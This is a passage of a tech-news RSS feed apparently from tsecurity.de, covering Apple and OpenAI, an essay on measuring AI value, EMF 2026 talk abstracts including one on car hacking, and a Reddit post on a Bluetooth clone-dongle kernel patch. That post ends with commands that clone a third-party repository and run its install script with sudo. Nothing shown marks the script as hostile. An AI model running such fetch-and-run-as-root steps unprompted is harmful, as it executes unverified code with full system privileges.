<li>Apple’s iPhone 17 series continues to sell well, with recent market data showing sustained growth. Both <a href="https://counterpointresearch.com/en/insights/china-smartphone-shipments-slip-2-percent-yoy-in-q2-2026">Counterpoint</a> and <a href="https://www.applemust.com/apple-bucks-the-trend-in-china-with-iphone/">IDC</a> tell us that iPhone shipments continue to increase, even as other vendor shipments slide.</li>



<li>IDC analyst Francisco Jeronimo <a href="https://thecorenews.substack.com/p/the-core-appletldr-july-20">recently estimated</a> that Apple’s upcoming foldable iPhone Ultra could grab 29.4% of global folding smartphone sales this year, rising to 34.9% in 2027.</li>



<li>The company’s new <a href="https://www.computerworld.com/article/4188961/these-apple-os-betas-are-just-what-the-believers-wanted.html">27 series of operating systems</a> is attracting a great response as beta testers report that it is already solid, stable, and performing well.</li>



<li>The AI narrative has really changed, with analysts no longer <a href="https://www.computerworld.com/article/4198808/apple-could-run-the-table-on-ai-if-it-does-things-right.html">quite so starry-eyed</a> at the prospects for the big frontier AI firms. Apple’s edge-AI-enabling approach is winning converts.</li>
</ul>



<h2 class="wp-block-heading"><strong>What’s coming up</strong></h2>



<p class="wp-block-paragraph">The company’s <a href="https://www.computerworld.com/article/4198342/apple-widens-openai-trade-secrets-fight-with-preservation-orders.html">newly-filed lawsuit against OpenAI</a> may or may not succeed, but it will certainly help consolidate recognition of the importance of Apple’s designs and intellectual property in whatever hardware emerges from the AI firm. It also means both Apple and OpenAI are already competing in hardware, even though neither company yet offers anything that directly challenges the other. </p>



<p class="wp-block-paragraph">Apple has just set out its stall to brand-loyal fans in a big way and did so before OpenAI gets to woo the same set of customers with a wriggle of its <a href="https://www.computerworld.com/article/3992592/jony-ive-and-openai-plan-bicycles-for-21st-century-minds.html">Jony Ive-tinged talisman</a>.</p>



<p class="wp-block-paragraph">The stage is set for intense competition between the two. Though some say Apple’s needs to improve  employee retention, if it does find proof of efforts to use recruitment to engage in industrial espionage, it’ll be easier to represent its own products as being the OG for new hardware. </p>



<p class="wp-block-paragraph">If nothing else, it means consumers will forever be asking, “If OpenAI’s designers are so good, why did it need to poach them from Apple?” Doubt is a weapon.</p>



<h2 class="wp-block-heading"><strong>Managing perception</strong></h2>



<p class="wp-block-paragraph">It doesn’t matter how the case goes, because there fight is already affecting consumer psychology. It also means that as Ternus prepares to take his seat atop the rainbow-colored Apple throne, we can already size him up. “A man is measured by his enemies,” Joe Abercrombie wrote in “The Trouble With Peace.”</p>



<p class="wp-block-paragraph">Given the proximity of the leadership transition, it’s highly probable that Ternus signed-off on the litigation; in doing so he — and Apple — tell us to expect more of the same. </p>



<p class="wp-block-paragraph">Apple has, rightly or wrongly, decided that OpenAI will become its new existential bugbear, following in the footsteps of Microsoft Windows, Real Networks, Adobe Flash, Android, and Samsung, all of whom have been useful foils against which Apple has been able to build and maintain its identity.</p>



<p class="wp-block-paragraph">Looking at that list, you’d be tempted to believe that nothing much is new. Apple has often defined itself by the enemies it sometimes keeps. What has been will be again, which in this case means even as OpenAI attempts to carve out an identity as a hardware manufacturer delivering solutions to compete with Apple and Google, Ternus’ team’s looks to drive a consensus-shaped wedge into the pro-LLM propaganda. </p>



<p class="wp-block-paragraph">That blow comes as Apple <a href="https://www.computerworld.com/article/4198808/apple-could-run-the-table-on-ai-if-it-does-things-right.html">finally gets its act together around AI</a>, and as the company prepares for a future in which the world’s most-used wearable device also becomes the wearable way to woo Siri AI.</p>



<h2 class="wp-block-heading"><strong>My kingdom come</strong></h2>



<p class="wp-block-paragraph">Rising market share, powerful solutions, an increasingly recognized and respected approach to AI, and an ideological crusade — these details constitute Apple’s place today and are Tim Cook’s coronation gift to Ternus. He’s passing along a strong and hyper-profitable baton that screams of timeliness and relevance even as the company gets set, ready, to go with a year or two of new product designs, new product families, and a <a href="https://www.computerworld.com/article/4104139/the-stage-is-being-set-for-20-years-of-iphone.html">20<sup>th</sup>anniversary iPhone</a>.</p>



<p class="wp-block-paragraph">This is Apple’s party. OpenAI’s name didn’t make the list. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Light made a flip phone. It’s colorful and it’s cheap.]]></title>
<description><![CDATA[Light co-founder Kaiwei Tang helped create the Motorola Razr, and he's as surprised as anyone that over twenty years later, the flip phone is relevant again.]]></description>
<link>https://tsecurity.de/de/3684097/it-nachrichten/light-made-a-flip-phone-its-colorful-and-its-cheap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684097/it-nachrichten/light-made-a-flip-phone-its-colorful-and-its-cheap/</guid>
<pubDate>Tue, 21 Jul 2026 17:03:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Light co-founder Kaiwei Tang helped create the Motorola Razr, and he's as surprised as anyone that over twenty years later, the flip phone is relevant again.]]></content:encoded>
</item>
<item>
<title><![CDATA[LG Monitor App Installer Criticized for McAfee Ads]]></title>
<description><![CDATA[LG’s Monitor App Installer has drawn criticism for automatically installing software with McAfee advertisements when compatible monitors connect to Windows computers. This article has been indexed from CyberMaterial Read the original article: LG Monitor App Installer Criticized for McAfee Ads
Rea...]]></description>
<link>https://tsecurity.de/de/3683823/it-security-nachrichten/lg-monitor-app-installer-criticized-for-mcafee-ads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683823/it-security-nachrichten/lg-monitor-app-installer-criticized-for-mcafee-ads/</guid>
<pubDate>Tue, 21 Jul 2026 15:25:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>LG’s Monitor App Installer has drawn criticism for automatically installing software with McAfee advertisements when compatible monitors connect to Windows computers. This article has been indexed from CyberMaterial Read the original article: LG Monitor App Installer Criticized for McAfee Ads</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/lg-monitor-app-installer-criticized-for-mcafee-ads/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/lg-monitor-app-installer-criticized-for-mcafee-ads/">LG Monitor App Installer Criticized for McAfee Ads</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wichtiges Windows-11-Update hilft bei plötzlich langsamen PC]]></title>
<description><![CDATA[Microsoft hat kurzfristig eine Korrektur für das Betriebssystem Windows 11 herausgegeben. Das Ergänzungs-Paket mit der Kennung KB5121767 behebt Tempoverluste und ungewöhnliches Verhalten des Computers, die nach den letzten Aktualisierungen im Juli aufgetreten sind. Ursache...]]></description>
<link>https://tsecurity.de/de/3683251/it-nachrichten/wichtiges-windows-11-update-hilft-bei-ploetzlich-langsamen-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683251/it-nachrichten/wichtiges-windows-11-update-hilft-bei-ploetzlich-langsamen-pc/</guid>
<pubDate>Tue, 21 Jul 2026 11:49:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft hat kurzfristig eine Korrektur für das Betriebssystem Windows 11 herausgegeben. Das Ergänzungs-Paket mit der Kennung KB5121767 behebt Tempoverluste und ungewöhnliches Verhalten des Computers, die nach den letzten Aktualisierungen im Juli aufgetreten sind. Ursache...]]></content:encoded>
</item>
<item>
<title><![CDATA[Europe slaps AliExpress with €550 million fine for selling dodgy goods]]></title>
<description><![CDATA[Biggest-ever DSA fine shows Brussels wants to bust the biz model behind China’s cheap e-commerce champs]]></description>
<link>https://tsecurity.de/de/3683033/it-nachrichten/europe-slaps-aliexpress-with-550-million-fine-for-selling-dodgy-goods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683033/it-nachrichten/europe-slaps-aliexpress-with-550-million-fine-for-selling-dodgy-goods/</guid>
<pubDate>Tue, 21 Jul 2026 10:33:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Biggest-ever DSA fine shows Brussels wants to bust the biz model behind China’s cheap e-commerce champs]]></content:encoded>
</item>
<item>
<title><![CDATA[Chinese open-weight models are cheap. Washington is deciding what that costs.]]></title>
<description><![CDATA[Enterprises evaluating Chinese open-weight models this month face a question that has nothing to do with benchmarks: whether using one will still be straightforward in a year. Moonshot AI’s Kimi K3 arrived on July 16 as the largest open-weight model yet released, and within days it had reopened a...]]></description>
<link>https://tsecurity.de/de/3682968/ai-nachrichten/chinese-open-weight-models-are-cheap-washington-is-deciding-what-that-costs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682968/ai-nachrichten/chinese-open-weight-models-are-cheap-washington-is-deciding-what-that-costs/</guid>
<pubDate>Tue, 21 Jul 2026 10:04:26 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprises evaluating Chinese open-weight models this month face a question that has nothing to do with benchmarks: whether using one will still be straightforward in a year. Moonshot AI’s Kimi K3 arrived on July 16 as the largest open-weight model yet released, and within days it had reopened a policy argument in Washington that had […]</p>
<p>The post <a href="https://www.artificialintelligence-news.com/news/chinese-open-weight-models-policy-risk/">Chinese open-weight models are cheap. Washington is deciding what that costs.</a> appeared first on <a href="https://www.artificialintelligence-news.com/">AI News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[„Desktop Explorer“ angespielt: Denksport für Profis]]></title>
<description><![CDATA[„Desktop Explorer“ lässt Spieler die rätselhaften Geheimnisse eines alten Computers entdecken. Ein minimalistisches, aber extrem forderndes Mystery-Abenteuer.]]></description>
<link>https://tsecurity.de/de/3682963/it-nachrichten/desktop-explorer-angespielt-denksport-fuer-profis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682963/it-nachrichten/desktop-explorer-angespielt-denksport-fuer-profis/</guid>
<pubDate>Tue, 21 Jul 2026 10:03:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[„Desktop Explorer“ lässt Spieler die rätselhaften Geheimnisse eines alten Computers entdecken. Ein minimalistisches, aber extrem forderndes Mystery-Abenteuer.]]></content:encoded>
</item>
<item>
<title><![CDATA[I tested Sony's new entry-level turntable and, though it sounds decent enough, you deserve so much more than a brand logo for this money]]></title>
<description><![CDATA[The Sony PS-LX3BT is a competent performer of an entry-level turntable, let down by a cheap chassis and high asking price]]></description>
<link>https://tsecurity.de/de/3681782/it-nachrichten/i-tested-sonys-new-entry-level-turntable-and-though-it-sounds-decent-enough-you-deserve-so-much-more-than-a-brand-logo-for-this-money/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681782/it-nachrichten/i-tested-sonys-new-entry-level-turntable-and-though-it-sounds-decent-enough-you-deserve-so-much-more-than-a-brand-logo-for-this-money/</guid>
<pubDate>Mon, 20 Jul 2026 19:05:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Sony PS-LX3BT is a competent performer of an entry-level turntable, let down by a cheap chassis and high asking price]]></content:encoded>
</item>
<item>
<title><![CDATA[An ordinary laptop solved a problem thought to require a quantum computer]]></title>
<description><![CDATA[A quantum problem once described as impossible for classical computers has now been solved using relatively modest hardware. Researchers used tensor networks to compress the overwhelming wave function created by hundreds of entangled qubits, allowing some calculations to run on…
Read more →
The p...]]></description>
<link>https://tsecurity.de/de/3681376/it-security-nachrichten/an-ordinary-laptop-solved-a-problem-thought-to-require-a-quantum-computer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681376/it-security-nachrichten/an-ordinary-laptop-solved-a-problem-thought-to-require-a-quantum-computer/</guid>
<pubDate>Mon, 20 Jul 2026 16:24:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A quantum problem once described as impossible for classical computers has now been solved using relatively modest hardware. Researchers used tensor networks to compress the overwhelming wave function created by hundreds of entangled qubits, allowing some calculations to run on…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/an-ordinary-laptop-solved-a-problem-thought-to-require-a-quantum-computer/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/an-ordinary-laptop-solved-a-problem-thought-to-require-a-quantum-computer/">An ordinary laptop solved a problem thought to require a quantum computer</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[With AI, activity is not value]]></title>
<description><![CDATA[The emergence of artificial intelligence is beginning to expose a profound weakness in the way modern enterprises measure performance.



For decades, business evaluation systems have been built around the logic of the industrial and transactional economy. Revenue growth, operating margins, earni...]]></description>
<link>https://tsecurity.de/de/3680938/it-security-nachrichten/with-ai-activity-is-not-value/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680938/it-security-nachrichten/with-ai-activity-is-not-value/</guid>
<pubDate>Mon, 20 Jul 2026 13:08:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The emergence of artificial intelligence is beginning to expose a profound weakness in the way modern enterprises measure performance.</p>



<p class="wp-block-paragraph"><a href="https://techeconomists.com/why-the-world-needs-new-economic-indicators/">For decades</a>, business evaluation systems have been built around the logic of the industrial and transactional economy. Revenue growth, operating margins, earnings per share, labor productivity, return on investment and market share became the dominant indicators of organizational success because they reflected the economic realities of a world in which value creation was primarily tied to physical production, labor efficiency, scale and later the automation of information processing. AI, however, is altering the very structure of enterprise value creation, and in doing so it is creating a widening separation between perceived future value and actual realized economic performance.</p>



<p class="wp-block-paragraph">Much of the current discussion <a href="https://howardarubin.substack.com/p/why-ai-roi-is-so-darn-hard-to-measure">surrounding AI performance measurement</a> reflects this tension. The overwhelming majority of AI-related metrics being celebrated today are not direct measures of realized enterprise outcomes. They are largely indicators of capability formation, market positioning, experimentation or investor signaling. Metrics such as AI spending levels, number of AI use cases, GPUs deployed, copilots implemented, models placed into production, AI hiring growth or agentic AI pilots all serve primarily as proxies for anticipated future advantage. These indicators may influence stock valuations, analyst sentiment and strategic narratives, but their relationship to measurable operational performance is often indirect, delayed or in some cases entirely speculative.</p>



<p class="wp-block-paragraph">This distinction is critically important because capital markets have historically rewarded the <em>expectation</em> of technological transformation long before actual economic results materialized. During previous technological revolutions—including electrification, enterprise resource planning, the internet, cloud computing and mobile platforms—valuation expansion frequently preceded measurable productivity gains by many years. The market priced future possibility before operational economics caught up. In many instances, investors rewarded firms simply for appearing strategically aligned with the dominant technological shift of the era. AI appears to be following a similar trajectory.</p>



<p class="wp-block-paragraph">The phenomenon resembles the famous <a href="https://www.brookings.edu/articles/the-solow-productivity-paradox-what-do-computers-do-to-productivity/">productivity paradox</a> articulated by economist Robert Solow, who observed that “you can see the computer age everywhere but in the productivity statistics.” AI today is visible everywhere: in investor presentations, earnings calls, technology conferences, product announcements and boardroom strategies. Yet in many industries, its measurable contribution to enterprise productivity, profitability or economic resilience remains difficult to isolate with precision. This does not necessarily mean AI lacks value. Rather, it reflects the reality that traditional accounting and performance systems were never designed to measure the forms of value AI increasingly produces.</p>



<p class="wp-block-paragraph">Artificial intelligence creates benefits that are often diffuse, cumulative and difficult to attribute directly to financial outcomes. AI may improve forecasting accuracy, reduce fraud, accelerate decision cycles, augment employee effectiveness, improve customer interactions, optimize logistics or enhance cybersecurity resilience. These benefits frequently manifest as second-order effects distributed across the enterprise rather than as immediately visible financial events. The causal chain between AI investment and realized business performance can therefore become extraordinarily difficult to quantify. A company may become operationally more intelligent without immediately becoming measurably more profitable.</p>



<p class="wp-block-paragraph">At the same time, AI introduces a profound danger: organizations may increasingly optimize for technological narrative rather than durable enterprise economics. Many firms today are pursuing AI primarily because markets reward the appearance of AI leadership. Investor enthusiasm, analyst pressure and competitive fear create incentives to demonstrate visible AI activity <a href="https://howardarubin.substack.com/p/talking-about-ai-value-is-like-talking">regardless of whether measurable economic value has actually been achieved</a>. In this environment, AI metrics can easily become instruments of valuation signaling rather than instruments of operational truth.</p>



<p class="wp-block-paragraph">This distinction between signaling and substance may become one of the defining economic challenges of the AI era. An organization may announce aggressive AI deployment programs, reduce headcount and report short-term margin improvements while simultaneously increasing hidden forms of technological fragility. Infrastructure costs may rise dramatically as GPU consumption, cloud usage, data engineering requirements and cybersecurity complexity expand. Technical debt may accelerate as AI-generated code proliferates without sufficient architectural discipline. Institutional knowledge may erode as organizations become excessively dependent on opaque models and automated systems. Long-term innovation capacity may weaken if enterprises divert disproportionate resources toward maintaining internally generated AI systems rather than building new strategic capabilities.</p>



<h2 class="wp-block-heading">What measuring AI value might actually look like</h2>



<p class="wp-block-paragraph">The distinction between AI activity and AI value becomes clearer when viewed through the kinds of measures organizations choose to track. Many enterprises today emphasize indicators such as the number of AI models deployed, copilots implemented, agents created, prompts executed, tokens consumed or employees using AI tools. These metrics demonstrate adoption and technological activity, but they reveal relatively little about whether AI is producing meaningful business outcomes.</p>



<p class="wp-block-paragraph">Measures of enterprise value look quite different. A manufacturer might evaluate whether AI improves demand forecasting accuracy enough to reduce inventory carrying costs or stockouts. A financial institution might measure whether AI meaningfully lowers fraud losses, accelerates loan processing or improves regulatory compliance. A healthcare provider could assess reductions in administrative burden, faster clinical decision support or improvements in patient throughput. In each case, the objective is not simply to measure AI deployment, but to determine whether AI creates measurable improvements in operational performance, economic outcomes or organizational resilience.</p>



<p class="wp-block-paragraph">Ultimately, organizations may need to ask a different question: not “How much AI are we using?” but “How much business value does each unit of AI investment create?” That shift—from measuring technological activity to measuring economic outcomes—may become one of the defining management disciplines of the AI era.</p>



<p class="wp-block-paragraph">Under traditional accounting frameworks, many of these deteriorations remain largely invisible. Quarterly earnings may improve even as underlying enterprise resilience declines. Stock prices may rise even as operational complexity becomes increasingly unsustainable. In this sense, the AI era threatens to widen the gap between financial appearance and organizational reality.</p>



<p class="wp-block-paragraph">This is why the future of enterprise measurement cannot simply involve adding AI metrics to existing financial scorecards. The challenge is far deeper. AI forces a reconsideration of what business performance actually means. Historically, enterprises were measured largely through static indicators of efficiency and output. Increasingly, however, competitive advantage may depend less on traditional efficiency and more on adaptive intelligence: the ability of an organization to learn faster, make better decisions, integrate human and machine capabilities effectively, manage technological complexity sustainably and convert computational power into durable economic outcomes.</p>



<p class="wp-block-paragraph">The most important future performance measures may therefore revolve around questions traditional accounting rarely addresses. How effectively does an enterprise convert technology investment into sustainable business capability? How economically efficient are its AI operations relative to the value they generate? How resilient is the organization to AI failure, cybersecurity disruption or infrastructure inflation? How successfully does it preserve and amplify human expertise rather than simply eliminate labor? How rapidly can it learn, adapt and operationalize new knowledge?</p>



<p class="wp-block-paragraph">These are not merely technology questions. They are questions of enterprise economics, organizational sustainability and long-term competitive viability.</p>



<p class="wp-block-paragraph">The companies that ultimately succeed in the AI era may not be those with the largest AI budgets, the greatest number of pilots or the most aggressive automation programs. They may instead be the firms that best understand the economics of technological capability itself: organizations capable of balancing innovation with resilience, automation with human augmentation and technological ambition with sustainable operational design.</p>



<p class="wp-block-paragraph">The coming decade is therefore likely to produce a widening divide between enterprises optimizing for AI-driven valuation narratives and enterprises optimizing for measurable, durable economic performance. In the short term, these may appear to be the same thing.</p>



<p class="wp-block-paragraph">Over time, however, the distinction will become increasingly visible. Some organizations will discover that AI has enhanced genuine enterprise capability. Others will discover that they merely optimized the appearance of transformation while silently accumulating new forms of economic and operational risk.</p>



<p class="wp-block-paragraph">Artificial intelligence is not simply changing business operations. It is exposing the inadequacy of many of the measures used to evaluate business success itself. The central challenge of the AI economy may ultimately become not whether organizations adopt AI, but whether they can distinguish between technological activity and actual economic value creation.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ever wondered whether upping the sound quality of your PS5 might improve your gaming chops? If so, Topping’s cheap new DAC is worth an audition]]></title>
<description><![CDATA[Topping's new DX1 II is an affordable DAC which is targeted specifically towards Switch or PS5 gamers —but even non-gamers should take note for this price]]></description>
<link>https://tsecurity.de/de/3680886/it-nachrichten/ever-wondered-whether-upping-the-sound-quality-of-your-ps5-might-improve-your-gaming-chops-if-so-toppings-cheap-new-dac-is-worth-an-audition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680886/it-nachrichten/ever-wondered-whether-upping-the-sound-quality-of-your-ps5-might-improve-your-gaming-chops-if-so-toppings-cheap-new-dac-is-worth-an-audition/</guid>
<pubDate>Mon, 20 Jul 2026 12:48:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topping's new DX1 II is an affordable DAC which is targeted specifically towards Switch or PS5 gamers —but even non-gamers should take note for this price]]></content:encoded>
</item>
<item>
<title><![CDATA[DistroWatch Weekly, Issue 1182]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  This week in DistroWatch Weekly: 
Review: Smaller, community-oriented, open source solutions
News: Haiku ports the NetBSD Virtual Machine Monitor, GNOME OS makes it easier to test experimental features, FreeBSD removes the last of ...]]></description>
<link>https://tsecurity.de/de/3680152/unix-server/distrowatch-weekly-issue-1182/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680152/unix-server/distrowatch-weekly-issue-1182/</guid>
<pubDate>Mon, 20 Jul 2026 02:31:02 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  This week in DistroWatch Weekly: <br>
Review: Smaller, community-oriented, open source solutions<br>
News: Haiku ports the NetBSD Virtual Machine Monitor, GNOME OS makes it easier to test experimental features, FreeBSD removes the last of the GPL code from its base<br>
Questions and answers: Installing software when the root filesystem is full<br>
Released....]]></content:encoded>
</item>
<item>
<title><![CDATA[Kodak EC35 is a dirt-cheap point-and-shoot film camera]]></title>
<description><![CDATA[Following the success of its $99 Kodak-branded Snapic A1, Reto Project is releasing the Kodak EC35, an even more affordable 35mm film camera for just $34.99. The EC35 certainly isn't fancy. Its 25mm acrylic lens with a fixed f/10 aperture and 1/100 shutter speed basically put it on par with a dru...]]></description>
<link>https://tsecurity.de/de/3679905/it-nachrichten/kodak-ec35-is-a-dirt-cheap-point-and-shoot-film-camera/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679905/it-nachrichten/kodak-ec35-is-a-dirt-cheap-point-and-shoot-film-camera/</guid>
<pubDate>Sun, 19 Jul 2026 21:47:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Following the success of its $99 Kodak-branded Snapic A1, Reto Project is releasing the Kodak EC35, an even more affordable 35mm film camera for just $34.99. The EC35 certainly isn't fancy. Its 25mm acrylic lens with a fixed f/10 aperture and 1/100 shutter speed basically put it on par with a drugstore disposable. The fact […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Dubstep Carrots - your gateway vegetable to accessible music making (emf2026)]]></title>
<description><![CDATA[Do we decide if we can play an instrument before we've even seen it? How much of our self-belief about our musicianship is based on adverse childhood experiences with cheap conventional instruments? How can we break through this barrier and rediscover the joy of noise, sound and musical play by s...]]></description>
<link>https://tsecurity.de/de/3679792/it-security-video/dubstep-carrots-your-gateway-vegetable-to-accessible-music-making-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679792/it-security-video/dubstep-carrots-your-gateway-vegetable-to-accessible-music-making-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 19:38:25 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Do we decide if we can play an instrument before we've even seen it? How much of our self-belief about our musicianship is based on adverse childhood experiences with cheap conventional instruments? How can we break through this barrier and rediscover the joy of noise, sound and musical play by shifting the idea of what constitutes a musical instrument?

Join us as we explore new ways of making music and sound with interfaces created from root vegetables, recycled materials and willing human test subjects in front of a live studio audience. 

Using a range of sensors, interfaces and microcomputers, we will explore accessible ways of making music and discuss why this matters so much for those who face disabling barriers when using conventional instruments.

Sometimes, the best musical instrument is a carrot... join us to find out why.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/237-dubstep-carrots]]></content:encoded>
</item>
<item>
<title><![CDATA[OBD-II: Obviously Broken Design, Too... My Introduction into car-hacking (emf2026)]]></title>
<description><![CDATA[Is it still your car? With a modern car running between 100 and 150 small computers - ECUs - the question is hard to answer. In 2015 some hackers took control together with a baffled Wired reporter of the car he was driving, from miles away. This led to a lot more interest in those computers cons...]]></description>
<link>https://tsecurity.de/de/3679773/it-security-video/obd-ii-obviously-broken-design-too-my-introduction-into-car-hacking-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679773/it-security-video/obd-ii-obviously-broken-design-too-my-introduction-into-car-hacking-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 18:54:48 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Is it still your car? With a modern car running between 100 and 150 small computers - ECUs - the question is hard to answer. In 2015 some hackers took control together with a baffled Wired reporter of the car he was driving, from miles away. This led to a lot more interest in those computers constantly talking to each other over CAN bus. There is a massive playground here and most people do not even know the gate is open.
Maybe you already have a Bluetooth ELM-327 dongle visualising CAN data on your smartphone. That is the crack that lets you dig deeper. The next step is the Macchina M2 - which goes so much further. You get direct access to more vehicle interfaces than most hackers even know exist.
I will show you SavvyCAN and Wireshark capturing live CAN traffic and we will decode what those packets are actually saying.
Your own car, your own hardware, completely legal. By the end of this talk you will want to go straight to the car park and plug something in.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/57-obd-ii-obviously-broken-design-too]]></content:encoded>
</item>
<item>
<title><![CDATA[Fixed CSR8510/Barrot Bluetooth clone dongle failures ("Unbranded CSR clone detected", HCI timeouts) — root cause + patch]]></title>
<description><![CDATA[Symptom: cheap USB Bluetooth dongles sold as "CSR 4.0/5.0/5.1/5.3 adapter" (lsusb: 0a12:0001 Cambridge Silicon Radio) fail to pair, time out on HCI commands, or hci0 gets stuck until unplug/replug. Kernel log shows: Bluetooth: hci0: CSR: Unbranded CSR clone detected; adding workarounds... Bluetoo...]]></description>
<link>https://tsecurity.de/de/3678776/linux-tipps/fixed-csr8510barrot-bluetooth-clone-dongle-failures-unbranded-csr-clone-detected-hci-timeouts-root-cause-patch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678776/linux-tipps/fixed-csr8510barrot-bluetooth-clone-dongle-failures-unbranded-csr-clone-detected-hci-timeouts-root-cause-patch/</guid>
<pubDate>Sun, 19 Jul 2026 04:54:40 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><strong>Symptom:</strong> cheap USB Bluetooth dongles sold as "CSR 4.0/5.0/5.1/5.3 adapter" (<code>lsusb</code>: <code>0a12:0001 Cambridge Silicon Radio</code>) fail to pair, time out on HCI commands, or <code>hci0</code> gets stuck until unplug/replug. Kernel log shows:</p> <pre><code>Bluetooth: hci0: CSR: Unbranded CSR clone detected; adding workarounds... Bluetooth: hci0: command 0x0401 tx timeout Bluetooth: hci0: CSR: Couldn't suspend the device for our Barrot 8041a02 receive-issue workaround </code></pre> <p><strong>Root cause:</strong> these are clone chips (Barrot 8041a02 and similar), not genuine CSR8510 hardware. They respond to some HCI init commands with malformed/incomplete data, and the kernel's existing clone-detection workaround doesn't fully compensate for it — so init either fails outright or the controller gets wedged after a timeout, with no automatic recovery.</p> <p><strong>Fix:</strong> patched <code>btusb</code> to handle these malformed responses correctly during init, fixed a fragile USB power-management suspend path that made things worse, and added automatic recovery (USB reset) on init failure/timeout instead of leaving <code>hci0</code> dead. Only affects the detected clone code path — genuine CSR hardware is untouched.</p> <p><strong>Result:</strong> adapter initializes and pairs normally instead of needing repeated unplug/replug/reset cycles.</p> <p><strong>Caveat:</strong> this covers the specific failure modes I could reproduce and test against; different clone batches use different chips internally (as pointed out in discussions elsewhere), so it may not cover every single fake CSR8510 variant out there.</p> <p>Repo (patch, DKMS install/rollback instructions): <a href="https://github.com/hhsnake/csr8510-fix">https://github.com/hhsnake/csr8510-fix</a></p> <p>Install:</p> <pre><code>sudo apt install dkms linux-headers-$(uname -r) git clone https://github.com/hhsnake/csr8510-fix.git cd csr8510-fix sudo ./install.sh </code></pre> <p>Tested on kernels 5.15–7.0+ across several Ubuntu LTS/HWE combinations.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Immediate_Ad_499"> 